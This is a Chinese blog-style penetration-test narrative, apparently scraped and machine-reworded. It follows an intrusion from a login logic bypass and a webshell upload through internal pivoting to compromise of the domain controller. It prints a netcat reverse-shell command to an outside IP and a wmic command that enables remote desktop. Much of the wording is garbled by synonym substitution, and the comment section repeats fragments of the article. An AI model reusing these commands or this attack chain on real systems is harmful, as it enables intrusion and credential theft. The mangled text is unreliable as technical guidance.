nmap端口扫描器
序言
争做美德少年,肺炎疫情期内,坚决贯彻政府部门与企业的规定,无可奈何在家工作的我一如既往的收到了渗入检测的每日任务。
正篇
话不多说,进行。
信息内容收集
规矩,第一步先从信息内容收集刚开始。
对总体目标开展二级域名收集,并沒有发觉二级域名。
扫描仪网站导航文档,就一个后台管理网页登陆,别的一片空白发觉。
以后还开展了nmap端口扫描器,都没有发现什么有使用价值的难题。
没法,只有正脸硬刚了。(PS:反映一下大家钢铁直男的性格特点)
手工制作检测
根据各种漏洞扫描工具都不可以非常好的出示有效的信息内容,只能取出了我的burp,一步一步的去看看。
根据抓包软件发觉,在网址的登录处存有弱密码传送,恰好网址都没有短信验证码体制(即使表层上面有短信验证码,诸位老师傅还要去试着一下短信验证码播放的难题)。
在了解复位登陆密码的状况下,试着暴力行为枚举类型,看一下能否得奖。
提醒登录名不会有,表明今天运气不行啊。
又试着更 改网址回应包来绕开网页登陆,也失败了。
不怕困难的我,又刚开始科学研究SQL引入,果然,SQL引入也不会有。
我这爆脾气,沒有领域模型构造系统漏洞、工程爆破不进去、SQL引入沒有……
早已刚开始提前准备滑水了,可是,忽然发觉了一个新情况。
扭转乾坤
因为滑水的姿态较为恰当(实际上信息内容收集的工作中一直就沒有停),发觉登录出错的情况下,网址正下方会有一个照片,根据一个白帽(小辣鸡)比较敏感的味觉,储存在当地之后查询,发觉是一个二维码。
浏览器打开扫一扫二维码,发觉是这一网址的app版。
柳暗花明又一村~~
把app下载出来,对apk文件开展逆向分析。
无可奈何,逆向分析、代码审计这类物品,并并不是我所善于的方位,因此 鼓捣了好长时间都没有結果,因此进军app的登录及其传输数据层面的难题。
走上正轨
根据burp抓app的登录包,并试着改动数据信息,发觉,登录不正确时,登录的回应包数据信息为:
{"code":1}
这里未确定。
这才算是真实的扭转乾坤,app登录处存有业务流程逻辑漏洞,取得成功进到后台管理。
以后便是基本的后台管理系统漏洞发觉了。
在头像照片处,能够开展上传文件,检测发觉只在前端开发做限定,根据抓包软件改动,立即绕开,取得成功获得webshell。
reGeog proxifier开展内网渗透
在获得webshell之后,发觉服务器防火墙DMZ地区投射外网地址端口号80,应用基本lcx等反跳专用工具被电脑杀毒软件阻拦,试着webshell提权未果。
一筹莫展之时,想起能够应用reGeog proxifier正端口转发使自身进到内部网。
一顿操作以后,取得成功进到内部网。
进到内部网以后,根据信息内容收集,发觉一台内部网服务器存有struts2指令实行系统漏洞。
立即运行命令,nc反跳端口号:
nc -e cmd.exe 1.0.0.1 3389
应用powershell线上抓去当地hash,出现意外发觉该服务器登录过域控服务器,取得成功爬取到域控服务器的登陆密码。
根据域指令查寻域控服务器IP,试着远程桌面连接联接,但域控服务器的远程桌面连接仍未打开。
试着应用指令打开远程桌面连接,但cmd指令被限定,但能够应用wmic指令。应用misc指令:
wmic / node:%pcname%/ USER:%pcaccount%PATHwin32_terminalservicesetting WHERE(__Class!=“”)CALL SetAllowTSConnections 1
取得成功登录域控服务器。
到此,此次渗入全过程圆满落幕~~
总结
整体而言,此次渗入還是做到了预估的总体目标,尽管全过程跌跌撞撞的,可是還是取得了自身要想的物品。
小结下此次渗入的知识要点:
1.信息内容收集很重要,全线信息内容收集别停
2.仔细很重要,不必忽略捕捉的每一条信息内容
3.确信你可以拿下他~~
文中创作者:酒仙桥六号军队
文中为安全性脉率栏目创作者公布,转截请标明:https://www.secpulse.com/archives/138023.html
相关文章
- 5条评论
- 弦久风晓2022-05-28 08:13:36
- 录过域控服务器,取得成功爬取到域控服务器的登陆密码。 根据域指令查寻域控服务器IP,试着远程桌面连接联接,但域控服务器的远程桌面连接仍未打开。 试着应用指令打开远程桌面连接,但cmd指令被限定,但能够应用wmic指令。
- 北槐乙白2022-05-28 08:24:16
- 序言 争做美德少年,肺炎疫情期内,坚决贯彻政府部门与企业的规定,无可奈何在家工作的我一如既往的收到了渗入检测的每日任务。 正篇 话不多说,进行。 01 信息内容收集 规矩,第一步先从信息内容收集刚开始。 对总体目标开展二级域名收集,并沒有发觉二级域名。
- 弦久鹿岛2022-05-28 11:15:35
- 器存有struts2指令实行系统漏洞。 立即运行命令,nc反跳端口号:nc -e cmd.exe 1.0.0.1 3389 应用po
- 澄萌迷麇2022-05-28 04:04:08
- 整体而言,此次渗入還是做到了预估的总体目标,尽管全过程跌跌撞撞的,可是還是取得了自身要想的物品。 小结下此次渗入的知识要点: 1.信息内容收集很重要,全线信息内容收集别停 2.仔细很重要,不必忽略捕捉的每一条信息内容 3.确信你可以拿下他~~ 文中创作者:酒仙桥六号军
- 痴妓葵袖2022-05-28 06:46:24
- 令实行系统漏洞。 立即运行命令,nc反跳端口号:nc -e cmd.exe 1.0.0.1 3389 应用powershe